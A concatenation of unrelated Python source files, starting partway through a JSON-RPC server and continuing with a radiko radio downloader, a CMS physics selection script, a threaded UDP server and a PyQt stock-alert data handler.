except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service
# listening on port 9999 by default, execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, starts the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    also allows the port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
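# Illustrative invocation (editorial, inferred from the __main__ block below):
#     python kb_transytServer.py input.json output.json [token-or-token-file]
# input.json holds a single JSON-RPC request; the response is written to
# output.json and the process exits with code 500 if the call produced an
# error, 0 otherwise.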
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
radipy.py
import base64
import datetime
import subprocess
import sys
import threading
import time
from pathlib import Path
from xml.etree import ElementTree as ET
import click
import requests
from prettytable import PrettyTable
DATE = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d-%H')
TMP_PATH = Path('./tmp').resolve()
if not TMP_PATH.exists():
print('Create tmp dir. path: {}'.format(str(TMP_PATH)))
TMP_PATH.mkdir(parents=True)
OUTPUT_PATH = Path('./output').resolve()
if not OUTPUT_PATH.exists():
print('Create output dir. path: {}'.format(str(OUTPUT_PATH)))
    OUTPUT_PATH.mkdir(parents=True)
PLAYERFILE_PATH = Path(TMP_PATH, 'player.{}.swf'.format(DATE))
KEYFILE_PATH = Path(TMP_PATH, 'authkey.{}.jpg'.format(DATE))
PLAYLISTFILE_PATH = Path(TMP_PATH, 'playlist.{}.m3u8'.format(DATE))
# Adapted from http://stackoverflow.com/questions/4995733/how-to-create-a-spinning-command-line-cursor-using-python
class Spinner:
busy = False
delay = 0.5
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\':
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
class Response(object):
def __init__(self, *args, **kwargs):
for k, v in kwargs.items():
self.__setattr__(k, v)
class Radipy(object):
player_url = 'http://radiko.jp/apps/js/flash/myplayer-release.swf'
fms1_url = 'https://radiko.jp/v2/api/auth1_fms'
fms2_url = 'https://radiko.jp/v2/api/auth2_fms'
LANG = 'ja_JP.utf8'
auth_response = Response()
auth_success_response = Response()
def __init__(self, station_id, ft):
self.station_id = station_id
self.ft = ft
self.partialkey = ''
self.stream_url = ''
self.area_id = ''
self.title = ''
@staticmethod
def clear():
        subprocess.call('rm -v {}/*.jpg'.format(TMP_PATH), shell=True)
        subprocess.call('rm -v {}/*.swf'.format(TMP_PATH), shell=True)
def authenticate(self):
self._get_playerfile()
self._get_keyfile()
self._get_auth1()
self._generate_partialkey()
self._get_auth2()
print('-' * 20)
print('authentication success.')
def get_channels(self):
self.authenticate()
self._get_area_id()
self._get_area_channels()
    def get_programs(self, dt=None):
        # avoid a default argument evaluated once at import time
        if dt is None:
            dt = datetime.datetime.now()
        self.authenticate()
        self._get_area_id()
date = datetime.datetime.strftime(dt, '%Y%m%d')
datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(date[:8], self.area_id)
res = requests.get(url=datetime_api_url)
channels_xml = res.content
tree = ET.fromstring(channels_xml)
station = tree.find('.//station[@id="{}"]'.format(self.station_id))
progs = station.findall('.//prog')
for prog in progs:
title = prog.find('.//title').text
ft = prog.attrib['ft']
print(ft, title)
def create(self):
self.authenticate()
self._get_area_id()
self._get_stream_url()
spinner = Spinner()
print("Now Downloading...")
spinner.start()
if self._create_aac():
print('finish!!')
else:
print('failed!!')
spinner.stop()
def _get_playerfile(self):
if PLAYERFILE_PATH.exists():
print('playerFile already exists.')
else:
print('create playerFile...')
res = requests.get(self.player_url)
if res.status_code == 200:
with PLAYERFILE_PATH.open('wb') as file:
file.write(res.content)
if not PLAYERFILE_PATH.exists():
print('playerfile is not created.')
exit()
def _get_keyfile(self):
if KEYFILE_PATH.exists():
print('keyfile already exists.')
else:
print('create KeyFile...')
subprocess.call('swfextract -b 12 {} -o {}'.format(PLAYERFILE_PATH, KEYFILE_PATH), shell=True)
if not KEYFILE_PATH.exists():
print('keyfile is not created. confirm swfextract is installed.')
exit()
def _get_auth1(self):
print('access auth1_fms...')
headers = {
'Host': 'radiko.jp',
'pragma': 'no-cache',
'X-Radiko-App': 'pc_ts',
'X-Radiko-App-Version': '4.0.0',
'X-Radiko-User': 'test-stream',
'X-Radiko-Device': 'pc'
}
res = requests.post(url=self.fms1_url, headers=headers)
self.auth_response.body = res.text
self.auth_response.headers = res.headers
self.auth_response.authtoken = self.auth_response.headers['x-radiko-authtoken']
self.auth_response.offset = int(self.auth_response.headers['x-radiko-keyoffset'])
self.auth_response.length = int(self.auth_response.headers['x-radiko-keylength'])
def _generate_partialkey(self):
        print('generate partialKey...')
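        # The partial key is the slice of the swf-extracted key file at the offset/length
        # announced by auth1_fms, base64-encoded for the X-Radiko-Partialkey header.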
with KEYFILE_PATH.open('rb+') as file:
file.seek(self.auth_response.offset)
data = file.read(self.auth_response.length)
self.partialkey = base64.b64encode(data)
def _get_auth2(self):
print('access auth2_fms...')
        headers = {
'pragma': 'no-cache',
'X-Radiko-App': 'pc_ts',
'X-Radiko-App-Version': '4.0.0',
'X-Radiko-User': 'test-stream',
'X-Radiko-Device': 'pc',
'X-Radiko-Authtoken': self.auth_response.authtoken,
'X-Radiko-Partialkey': self.partialkey,
}
res = requests.post(url=self.fms2_url, headers=headers)
self.auth_success_response.body = res.text
self.auth_success_response.headers = res.headers
def _get_area_id(self):
area = self.auth_success_response.body.strip().split(',')
self.area_id = area[0]
print('area_id: {}'.format(self.area_id))
def _get_area_channels(self):
area_api_url = "http://radiko.jp/v3/station/list/{}.xml".format(self.area_id)
res = requests.get(url=area_api_url)
channels_xml = res.content
tree = ET.fromstring(channels_xml)
stations = tree.findall('.//station')
table = PrettyTable(['id', '名前'])
table.align['station_id'] = 'l'
table.align['station_name'] = 'l'
table.padding_width = 2
for station in stations:
row = []
for child in station.iter():
if child.tag in ('id', 'name'):
row.append(child.text)
table.add_row(row)
print(table)
def _get_stream_url(self):
try:
datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(self.ft[:8], self.area_id)
res = requests.get(url=datetime_api_url)
channels_xml = res.content
tree = ET.fromstring(channels_xml)
station = tree.find('.//station[@id="{}"]'.format(self.station_id))
prog = station.find('.//prog[@ft="{}"]'.format(self.ft))
to = prog.attrib['to']
            # If the programme runs past midnight, look it up in the previous day's schedule
except AttributeError:
pre_date = datetime.datetime.strptime(self.ft[:8], '%Y%m%d') - datetime.timedelta(days=1)
datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(pre_date.strftime('%Y%m%d'), self.area_id)
res = requests.get(url=datetime_api_url)
channels_xml = res.content
tree = ET.fromstring(channels_xml)
station = tree.find('.//station[@id="{}"]'.format(self.station_id))
prog = station.find('.//prog[@ft="{}"]'.format(self.ft))
to = prog.attrib['to']
        self.title = prog.find('.//title').text.replace(' ', '_').replace('\u3000', '_')  # replace half- and full-width spaces
table = PrettyTable(['title'])
table.add_row([self.title])
table.padding_width = 2
print(table)
self.stream_url = 'https://radiko.jp/v2/api/ts/playlist.m3u8?l=15&station_id={}&ft={}&to={}'.format(
self.station_id,
self.ft,
to
)
def _create_aac(self):
try:
program_dir = Path(OUTPUT_PATH, self.title)
if not program_dir.exists():
print('create program dir: {}'.format(program_dir))
program_dir.mkdir()
aac_file = Path(program_dir, '{}_{}.aac'.format(self.title, self.ft[:8]))
cmd = ('ffmpeg '
'-loglevel fatal '
'-n -headers "X-Radiko-AuthToken: {}" '
'-i "{}" '
'-vn -acodec copy "{}"'.format(
self.auth_response.authtoken,
self.stream_url,
aac_file
))
subprocess.call(cmd, shell=True)
print('create aac file: {}'.format(aac_file))
return True
except Exception:
return False
@click.command(help='Radipy is CLI radiko Downloader written by python3.')
@click.option('-a', '--area', is_flag=True, help='print station id & name in your area')
@click.option('-ls', is_flag=True, help='print program titles & start time. using with -id option')
@click.option('-dt', type=click.DateTime(), help='print program titles & start time. using with -ls, -id option')
@click.option('-id', type=str, help='set station id')
@click.option('-ft', type=str, help='set start datetime str formated by yyyyMMddHHmm e.g. 201804171830')
@click.option('--clear', is_flag=True, help='clear authkey and player in tmp dir')
def main(area, id, ft, ls, clear, dt):
if clear:
Radipy.clear()
elif area:
radipy = Radipy(0, 0)
radipy.get_channels()
elif id and ft:
radipy = Radipy(station_id=id, ft=ft)
radipy.create()
elif id and ls and dt:
radipy = Radipy(station_id=id, ft=0)
radipy.get_programs(dt=dt)
elif id and ls:
radipy = Radipy(station_id=id, ft=0)
radipy.get_programs()
if __name__ == '__main__':
main()
|
runSelectionSequence.py
|
from __future__ import division, print_function
import ROOT
from PhysicsTools.NanoAODTools.postprocessing.framework.postprocessor import PostProcessor
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module
from PhysicsTools.NanoAODTools.postprocessing.tools import * #DeltaR, match collection methods
from PhysicsTools.NanoAODTools.postprocessing.modules.common.puWeightProducer import *
from FourTopNAOD.Kai.modules.MCTreeDev import TenKTree
from FourTopNAOD.Kai.modules.MCTreePlot import MCTreePlot
from FourTopNAOD.Kai.modules.BaselineSelector import BaselineSelector
from FourTopNAOD.Kai.modules.trigger import Trigger
import collections, copy, json
import multiprocessing
import os, time
Tuples=[]
basefiles=["tree_1.root", "tree_2.root", "tree_3.root", "tree_4.root", "tree_5.root", "tree_6.root"]
preTTTT="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTTTv2/results/"
preTT2L="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTTo2L2Nu/results/"
preTT2LGF="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTTo2L2Nu_GenFilt/results/"
preTT1L="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTToSemiLeptonic/results/"
preTT1LGF="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTToSemiLeptonic_GenFilt/results/"
triggers=["HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass3p8",
"HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ",
"HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ",
"HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ",
"HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ"
]
hName="SelSeq-TTTT-PU-TRG.root"
fName="SelSeq-TTTT-PU-TRG.root"
files=[preTTTT+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTT-SingleLepton-PU-TRG.root"
fName="SelSeq-TTTT-SingleLepton-PU-TRG.root"
files=[preTTTT+file for file in basefiles]
filt=1
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTT-DiLepton-PU-TRG.root"
fName="SelSeq-TTTT-DiLepton-PU-TRG.root"
files=[preTTTT+file for file in basefiles]
filt=2
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTT-TriLepton-PU-TRG.root"
fName="SelSeq-TTTT-TriLepton-PU-TRG.root"
files=[preTTTT+file for file in basefiles]
filt=3
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTo2L2Nu-PU-TRG.root"
fName="SelSeq-TTTo2L2Nu-PU-TRG.root"
files=[preTT2L+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTo2L2NuGF-PU-TRG.root"
fName="SelSeq-TTTo2L2NuGF-PU-TRG.root"
files=[preTT2LGF+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTToSemiLeptonic-PU-TRG.root"
fName="SelSeq-TTToSemiLeptonic-PU-TRG.root"
files=[preTT1L+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTToSemiLeptonicGF-PU-TRG.root"
fName="SelSeq-TTToSemiLeptonicGF-PU-TRG.root"
files=[preTT1LGF+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
def multiplier(fileList, hName=None, fName="def.root", NLeps=None, maxevt=10000):
hName = None
hDirName = None
p=PostProcessor(".",
fileList,
modules=[puWeightProducer("auto",pufile_data2017,"pu_mc","pileup",verbose=True),
Trigger(triggers),
BaselineSelector(isData=True, era="2017", btagging=['DeepCSV','M'], lepPt=25, MET=50, HT=500, invertZWindow=False, GenTop_LepSelection=None),
# MCTreePlot(maxevt=maxevt, filterNLeps=NLeps)
],
haddFileName=fName,
noOut=False,
# histFileName=hName,
# histDirName=hDirName,
)
p.run()
pList = []
nmbr = 0
for tup in Tuples:
if nmbr > 0: continue
nmbr += 1
p = multiprocessing.Process(target=multiplier, args=(tup[0], tup[1], tup[2], tup[3], 10000))
pList.append(p)
p.start()
for p in pList:
p.join()
|
UDP_server_Threaded.py
|
#! /usr/bin/env python
###############################################################################
# UDP_server_Threaded.py
#
# Threaded UDP server
#
# NOTE: Any plotting is set up for output, not viewing on screen.
# So, it will likely be ugly on screen. The saved PDFs should look
# better.
#
# Created: 01/27/16
# - Joshua Vaughan
# - joshua.vaughan@louisiana.edu
# - http://www.ucs.louisiana.edu/~jev9637
#
# Modified:
# *
#
###############################################################################
# Allow use (maybe) in Python 2
from __future__ import print_function
import socket
import threading
import socketserver
import time
# TODO: Fix this nasty global variable hack
data, x_data, y_data = None, None, None
# Send some data to start communication?
SEND_DATA = False
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
"""
The RequestHandler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
global data #x_data, y_data
data = self.request[0].strip()
socket = self.request[1]
string_to_print = "Data from {}: {}".format(self.client_address, data)
print(string_to_print)
# x,sep,y = data.partition(',')
# x_data = float(x)
# y_data = float(y)
# socket.sendto(string_to_print.encode('utf-8'), self.client_address)
# Streaming?... change above to SocketServer.StreamRequestHandler
# def handle(self):
# # self.rfile is a file-like object created by the handler;
# # we can now use e.g. readline() instead of raw recv() calls
# self.data = self.rfile.readline().strip()
# print "{} wrote:".format(self.client_address[0])
# print self.data
# # Likewise, self.wfile is a file-like object used to write back
# # to the client
# self.wfile.write(self.data.upper())
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
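# Minimal client sketch for exercising this server (assumes the HOST/PORT values used below):
#   import socket
#   sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   sock.sendto(b'hello from a test client', ('10.0.1.6', 2390))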
if __name__ == '__main__':
# Port 0 means to select an arbitrary unused port
HOST, PORT = '10.0.1.6', 2390
server = ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target = server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print('Server loop running in thread: {}'.format(server_thread.name))
# we can now count and receive UDP packets at the same time
try:
if SEND_DATA:
UDP_TARGET_IP = '10.0.1.99'
UDP_PORT = 2390
MESSAGE = 'Hello from the Python server'
send_sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
send_sock.sendto(MESSAGE.encode('utf-8'), (UDP_TARGET_IP, UDP_PORT))
while True:
if SEND_DATA:
send_sock.sendto(MESSAGE.encode('utf-8'), (UDP_TARGET_IP, UDP_PORT))
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
        print('Waiting for server to shut down and close...')
server.socket.close()
server.shutdown()
server_thread.join(2) # Wait for the server thread to terminate
server.server_close()
print('Closing...')
|
data_handler.py
|
from config import command_ledger, data_ledger
import time
from PyQt5 import QtWidgets, QtCore, QtGui
from yahoofinancials import YahooFinancials
from dicttoxml import dicttoxml
import xmltodict
from xml.dom.minidom import parseString
import threading
import windows.popups.popup_handler as ph
import datetime as dt
'''
*** command_ledger Documentation:
command_ledger = [{command_type1: [parameter1, parameter2]}, {command_type2: [parameter1, parameter2, parameter3]}]
Format Documentation:
Add new alert:
Type: Price reference/type
{'addAlert': [alertlist, name, symbol, reference, operator, threshold]}
Add new watch:
        {'addWatch': [watchlist, name, symbol, reference, operator, threshold]}
Add alert list:
{'addList': ['Alert', listname]}
Delete alert list:
{'deleteList': ['Alert', [listname1, listname2, ...]]}
Save lists to file:
        {'savetofile': filepath}
Open list from file:
{'openfile': filepath}
Create new list:
{'new': None}
Switch list view:
{'changeList': [listtype, listname]}
Force GUI update:
{'forceGUIUpdate': None}
    Format:
        self.data_ledger = { Header: {Misc. Information},
                             Alertlists:
                                 { Alertlist1: {Stockname: {XYZ}, Stockname: {XYZ}},
                                   Alertlist2: {Stockname: {XYZ}} },
                             Watchlists:
                                 { Watchlist1: {Stockname: {ABC}} }
                           }
*** self.data_ledger Documentation:
self.data_ledger =
{ Header: {'active': {'activeListtype': listtype,'activeListname': listname}},
Alertlists:
{ AlertlistName:
{ Coca Cola:
{ Symbol: CO,
Alert1: *** TYPE PRICE EXAMPLE ***
{
Reference: Price,
Operator: Over,
Threshold: 53,
Price: 47,
Ratio: 0.987
},
Alert2:
{ XYZ
}
}
}
},
Watchlists:
        { WatchlistName:
{ Palantir:
{ Symbol: PLTR,
Price: 24,
Watch:
{
                        'price_1d': 24,   # 1 day
                        'chg_1d': None,
                        'price_1w': 32,   # 5 days
                        'chg_1w': None,
                        'price_1m': 17,   # 30 days
                        'chg_1m': None,
                        'price_1y': 7,    # 360 days
                        'chg_1y': None
}
}
}
}
}
'''
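# Illustrative command in the format documented above (the list name, stock name and
# threshold are hypothetical); DataHandler.logic_loop consumes and removes the entry:
#   command_ledger.append({'addAlert': ['MyAlerts', 'Coca_Cola', 'KO', 'Price', 'Over', 53]})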
# TODO Remember Listsort
# noinspection SpellCheckingInspection
class DataHandler():
def __init__(self, root_ui):
#load previous lists or load default self.data_ledger
self.data_ledger = {'Header': {'active': {'activeListtype': None, 'activeListname': None},
'settings': None},
'Alertlists': {},
'Watchlists': {}
}
update_timer = 300
ud_thread = threading.Thread(target=self.update_data, name='Data Updater', args=(update_timer,))
ud_thread.start()
#TODO change on autoload
self.current_file_path = ''
print('DataHandler initialized')
def logic_loop(self, root_ui):
while True:
def process_new_commands():
if command_ledger:
for command in list(command_ledger):
print('Command:', command)
if str(list(command.keys())[0]) == 'addAlert':
if self.data_ledger['Alertlists'][command['addAlert'][0]] is None or command['addAlert'][1] not in self.data_ledger['Alertlists'][command['addAlert'][0]].keys():
self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]] = {}
self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]]['Symbol'] = command['addAlert'][2]
self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]]['Price'] = ' - - - '
new_list_count = sum('Alert' in s for s in list(self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]].keys())) + 1
self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]]['Alert{}'.format(new_list_count)] = \
{
'Reference': command['addAlert'][3],
'Operator': command['addAlert'][4],
'Threshold': command['addAlert'][5],
'Ratio': None,
}
self.update_sleep = False
update_gui()
elif str(list(command.keys())[0]) == 'addWatch':
if self.data_ledger['Watchlists'][command['addWatch'][0]] is None or command['addWatch'][1] not in self.data_ledger['Watchlists'][command['addWatch'][0]].keys():
if self.data_ledger['Watchlists'][command['addWatch'][0]] is None:
self.data_ledger['Watchlists'][command['addWatch'][0]] = {}
self.data_ledger['Watchlists'][command['addWatch'][0]][command['addWatch'][1]] = {}
self.data_ledger['Watchlists'][command['addWatch'][0]][command['addWatch'][1]]['Symbol'] = command['addWatch'][2]
self.data_ledger['Watchlists'][command['addWatch'][0]][command['addWatch'][1]]['Price'] = None
self.data_ledger['Watchlists'][command['addWatch'][0]][command['addWatch'][1]]['Watch'] = \
{
'price_1d': None,
'chg_1d': None,
'price_1w': None,
'chg_1w': None,
'price_1m': None,
'chg_1m': None,
'price_1y': None,
'chg_1y': None
}
#TODO: Add other custom Indicators to track. E.g. SMA, EMA, RSI, high, low
self.update_sleep = False
update_gui()
elif str(list(command.keys())[0]) == 'addList':
# TODO Add watchlists here
if command['addList'][0] == 'Alert':
self.data_ledger['Alertlists'][command['addList'][1].replace(' ', '_')] = {}
                                if None in self.data_ledger['Header']['active'].values():
self.data_ledger['Header']['active'] = {'activeListtype': 'Alertlists', 'activeListname': command['addList'][1].replace(' ', '_')}
elif command['addList'][0] == 'Watch':
self.data_ledger['Watchlists'][command['addList'][1].replace(' ', '_')] = {}
                                if None in self.data_ledger['Header']['active'].values():
self.data_ledger['Header']['active'] = {'activeListtype': 'Watchlists', 'activeListname': command['addList'][1].replace(' ', '_')}
update_gui()
elif str(list(command.keys())[0]) == 'deleteList':
# TODO Add watchlists here
if command['deleteList'][0] == 'Alert':
for list_to_delete in command['deleteList'][1]:
del self.data_ledger['Alertlists'][list_to_delete.replace(' ', '_')]
if list_to_delete.replace(' ', '_') == self.data_ledger['Header']['active']['activeListname']:
self.data_ledger['Header']['active']['activeListtype'] = 'Alertlists'
self.data_ledger['Header']['active']['activeListname'] = root_ui.listWidget_alertlists.item(0).text().replace(' ', '_')
elif command['deleteList'][0] == 'Watch':
for list_to_delete in command['deleteList'][1]:
del self.data_ledger['Watchlists'][list_to_delete.replace(' ', '_')]
if list_to_delete.replace(' ', '_') == self.data_ledger['Header']['active']['activeListname']:
self.data_ledger['Header']['active']['activeListtype'] = 'Watchlists'
self.data_ledger['Header']['active']['activeListname'] = root_ui.listWidget_watchlists.item(0).text().replace(' ', '_')
update_gui()
elif str(list(command.keys())[0]) == 'save':
if self.current_file_path == '':
ph.popup_triggers('savetofile', root_ui=root_ui)
else:
save_file_dict = parseString(dicttoxml(self.data_ledger, attr_type=False))
f = open(self.current_file_path, 'w', encoding='utf-8')
f.write(save_file_dict.toprettyxml())
f.close()
elif str(list(command.keys())[0]) == 'savetofile':
if not command['savetofile'] == '':
self.current_file_path = command['savetofile']
save_file_dict = parseString(dicttoxml(self.data_ledger, attr_type=False))
f = open(command['savetofile'], 'w', encoding='utf-8')
f.write(save_file_dict.toprettyxml())
f.close()
elif str(list(command.keys())[0]) == 'openfile':
if not command['openfile'] == '':
self.current_file_path = command['openfile']
f = open(command['openfile'], 'r', encoding='utf-8')
self.data_ledger = dict(xmltodict.parse(f.read(), process_namespaces=False, dict_constructor=dict))['root']
f.close()
                                if self.data_ledger['Alertlists'] is None:
                                    self.data_ledger['Alertlists'] = {}
                                if self.data_ledger['Watchlists'] is None:
                                    self.data_ledger['Watchlists'] = {}
self.update_sleep = False
update_gui()
elif str(list(command.keys())[0]) == 'new':
self.current_file_path = None
self.data_ledger = {'Header': {'active': {'activeListtype': None, 'activeListname': None}},
'Alertlists': {},
'Watchlists': {}
}
update_gui()
elif str(list(command.keys())[0]) == 'changeList':
self.data_ledger['Header']['active'] = {'activeListtype': command['changeList'][0], 'activeListname': (command['changeList'][1].text().replace(' ', '_'))}
update_gui()
elif str(list(command.keys())[0]) == 'forceGUIUpdate':
update_gui()
command_ledger.remove(command)
process_new_commands()
def update_gui():
#TODO Color or bold active list in listwidget
print('Updating Gui')
root_ui.listWidget_alertlists.clear()
root_ui.listWidget_watchlists.clear()
if self.data_ledger['Alertlists'] is not None:
[root_ui.listWidget_alertlists.addItem(listname.replace('_', ' ')) for listname in self.data_ledger['Alertlists'].keys()]
#[root_ui.listWidget_alertlists.item(i).setTextAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter) for i in range(root_ui.listWidget_alertlists.count())]
if self.data_ledger['Watchlists'] is not None:
[root_ui.listWidget_watchlists.addItem(listname.replace('_', ' ')) for listname in self.data_ledger['Watchlists'].keys()]
#[root_ui.listWidget_watchlists.item(i).setTextAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter) for i in range(root_ui.listWidget_watchlists.count())]
if self.data_ledger['Header']['active']['activeListtype'] == 'Alertlists':
columns = ['Stock', 'Condition', 'Price', 'Ratio']
root_ui.tableWidget_listDisplay.setColumnCount(len(columns))
for i in range(len(columns)):
item = QtWidgets.QTableWidgetItem()
font = QtGui.QFont()
font.setFamily("Roboto")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
root_ui.tableWidget_listDisplay.setHorizontalHeaderItem(i, item)
root_ui.tableWidget_listDisplay.setHorizontalHeaderLabels(columns)
